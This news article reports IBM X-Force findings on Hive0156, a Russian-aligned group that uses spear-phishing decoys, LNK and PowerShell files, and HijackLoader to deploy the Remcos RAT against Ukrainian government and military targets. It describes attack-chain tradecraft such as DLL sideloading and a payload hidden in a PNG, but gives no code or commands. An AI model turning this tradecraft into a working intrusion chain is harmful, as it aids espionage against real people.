Russian-Aligned Hive0156 Escalates Remcos RAT Attacks on Ukrainian Government & Military
Do Son 
Hive0156 attack chain | Image: IBM X-Force
IBM’s X-Force has raised the alarm on an intensifying series of cyberattacks orchestrated by the Russian-aligned threat group Hive0156. As of early July 2025, this sophisticated actor has been targeting Ukrainian government and military entities through a wave of spear-phishing campaigns that deliver the powerful Remcos Remote Access Trojan (RAT) via deceptively crafted Windows LNK and PowerShell files.
“Hive0156 is a Russian-aligned threat actor seeking to compromise individuals within the Ukrainian government or military,” stated IBM X-Force. “The group’s Tools, Tactics and Procedures (TTPs) strongly overlap with CERT-UA’s UAC-0184 actor.”
In the first half of 2025, Hive0156 weaponized emotionally and strategically charged decoy documents to lure Ukrainian military personnel into opening malicious attachments. These decoys included Excel and Word documents with filenames such as:
- uzagalnena_informacia_spisan_vtrat_33_ombr_100103.xlsx — Referencing the 33rd Mechanized Brigade’s wartime losses.
- Nakaz_shchodo_perevyrky_gotovnosty_1mehbat_14.07.2024.docx — A battalion readiness order.
- Pozicii_protivnika_zapad_i_yugo_zapad.xlsx — Containing supposed coordinates of enemy positions.
“The decoy is an unauthenticated functional Excel document with various metrics generally communicating the levels of various resources,” the report explains.
However, a notable shift was observed post-mid-2025: “As of mid-2025, X-Force is observing transliterated Ukrainian language decoy documents featuring themes related to ‘petitions,’ ‘official cover letters’ or ‘formal rejections’… a departure from the group’s emphasis on military themes.”
Hive0156’s current infection chain is deceptively simple but technically formidable:
- Initial Access
Users receive either .lnk or PowerShell files, which initiate contact with the group’s Command-and-Control (C2) infrastructure. Geofencing and header filtering are used to tailor payload delivery. - HijackLoader Deployment
The initial loader—also known as IDAT Loader—downloads a ZIP archive containing:- A legitimate signed executable (PortRemo.exe)
- Supporting and patched DLLs (Tools.dll, sqlite3.dll)
- Obfuscated files including shellcode and a malicious PNG (Churtseechang.vky, Weertijeegdoob.jm)
“The patched DLL will read and decrypt the first-stage shellcode… then decrypt the PNG file that contains HijackLoader components.”
- Remcos RAT Execution
Ultimately, the decrypted components execute Remcos RAT with selected modules. Despite its sparse configuration, it maintains a powerful connection to Hive0156’s infrastructure and awaits commands.
Originally designed as a legitimate remote administration tool, Remcos is now heavily abused by cybercriminals. IBM X-Force details its vast command set and configuration options:
- Remote shell and keylogging
- Webcam and microphone surveillance
- File exfiltration, clipboard capture, and screen recording
- Registry editing, browser data clearing, and even alarm playback
“Remcos may be used by legitimate system administrators; however, it is also heavily used by various malicious threat actors.”
X-Force observed campaign IDs like hmu2005, ra2005, and ra2005new, indicating multiple simultaneous operations.
Hive0156 maintains a global network of C2 servers, likely aided by lax enforcement from hosting providers in Russia and other regions. Their use of geofencing, filtering, and modular payload activation implies strategic restraint and a focus on long-term access.
Related Posts:
- Russian-Aligned TAG-110 Targets Tajikistan Governments with Stealthy Cyber-Espionage
- Beware of Word: Remcos RAT Lurks in Malicious Documents
- Remcos RAT: Hackers Target Ukrainian Government with Surveillance Tool
- Stealthy Remcos RAT Campaign Uses PowerShell to Evade Antivirus Detection
- Researcher Uncovers New Phishing Campaign Deploying Remcos RAT with Advanced Evasion Techniques
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
